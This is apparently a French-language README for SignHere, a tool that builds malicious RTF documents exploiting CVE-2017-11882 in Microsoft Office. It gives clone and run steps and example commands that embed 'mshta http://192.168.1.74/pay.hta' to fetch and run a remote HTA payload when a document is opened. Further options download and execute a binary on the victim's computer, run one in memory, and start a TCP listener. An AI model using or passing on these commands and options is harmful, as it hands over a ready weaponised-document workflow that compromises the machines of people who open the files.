
SignHere est une implémentation de CVE-2017-11882. SignHere est un constructeur de documents rtf malveillants et de payloads VBScript.
CVE-2017-11882 - L'identifiant unique de vulnérabilité de Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1 et Microsoft Office 2016 permet à un attaquant d'exécuter du code dans le contexte de l'utilisateur actuel sans gérer correctement les objets en mémoire, la soi-disant « vulnérabilité de corruption de mémoire de Microsoft Office ». L'implémentation inclut la création d'un programme pour construire des documents rtf malveillants et des charges utiles en VBScript
Ce sont les documents rtf qui sont vulnérables car ils peuvent être « programmés » en connaissant des commandes spéciales – les en-têtes RTF. Ainsi, un objet binaire (exécutable) est créé dans le corps du document, il s'agit en fait d'une formule Microsoft Equation avec le code contenant la commande cmd. Ensuite, vous pouvez générer la charge utile en VBScript et utiliser la commande « mshta lien vers le fichier de charge utile » pour exécuter le fichier hta.
L'auteur et les contributeurs ne sont pas responsables des dommages causés à vous ou par vous.
Vous pouvez utiliser Termux, mais l'exécution du programme nécessite les droits root
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
Tout d'abord, vous devez télécharger l'archive. Ensuite, décompressez-la et ouvrez une fenêtre PowerShell dans ce dossier, puis tapez :
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd Argument avec la commande Windows qui sera exécutée après l'ouverture du document.
--powershell Argument avec la commande PowerShell qui sera dans la charge utile VBScript.
--ip Argument avec l'adresse IP qui sera utilisée pour le serveur web. (par défaut : 127.0.0.1)
--output Nom et chemin du document.
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp Argument qui utilisera un fichier binaire comme charge utile (le fichier binaire démarrera dans la mémoire RAM).
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload Argument qui téléchargera un fichier sur l'ordinateur de la victime et l'exécutera.
--listener-host Argument pour démarrer un écouteur TCP sur l'IP actuelle (par défaut : 127.0.0.1)